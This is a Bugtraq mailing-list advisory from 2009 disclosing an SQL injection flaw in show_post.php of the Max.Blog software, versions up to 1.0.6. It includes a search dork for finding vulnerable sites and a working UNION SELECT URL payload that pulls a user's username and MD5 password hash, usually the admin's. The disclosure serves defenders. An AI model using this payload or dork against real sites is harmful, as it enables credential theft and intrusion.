Max.Blog <= 1.0.6 (show_post.php) SQL Injection Vulnerability
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: Max.Blog <= 1.0.6 (show_post.php) SQL Injection Vulnerability
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Tue, 27 Jan 2009 16:27:06 +0100
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=PN6d8SHFtxKbMYNtFwi5F05B6grwDSkPblhLuJ7G7cw=; b=x/0rwi/BjE9ypFEgb2MCSKAmhnU7cedIs8B+A8JF/vRYo1ms311CDgNzrD/gpKcDz2 AxbnqyVXc4x3U35Sdj04y8yO69BMeLKCcq1OhzhEZezliltwgDebrv88qLTne7l6wWen v62qyrkTCP68ZCAIY9BRB0kvw0744CDUG5oAY=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=KnJWa2CbUVJjV5KgIMWSxTFq0NJ+EujPG/E276zDHpsO+v+e+dfPlnCC9HM1eDYF+A zhdT509awm1yoyba2qxd8G8p9ea04p+gUEvYND7DVzN2EigVOm2oNHSq9eXif7eZmgwc yOJNqUX1xCqQZK8AZrgZtUUg1/vgLkf5Q20BE=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
################### Salvatore "drosophila" Fresta
###################
Application: Max.Blog
http://www.mzbservices.com
Version: Max.Blog <= 1.0.6
Bug: * SQL Injection
Exploitation: Remote
Dork: intext:"Powered by Max.Blog"
Date: 20 Jan 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophilaxxx@xxxxxxxxx
############################################################################
- BUGS
SQL Injection:
File affected: show_post.php
This bug allows a guest to view username and password (md5) of a
registered user with the specified id (usually 1 for the admin)
http://www.site.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username:
', username),concat('password: ',
password),4,5,6,7+FROM+users+WHERE+id=1%23
############################################################################
--
Salvatore "drosophila" Fresta
CWNP444351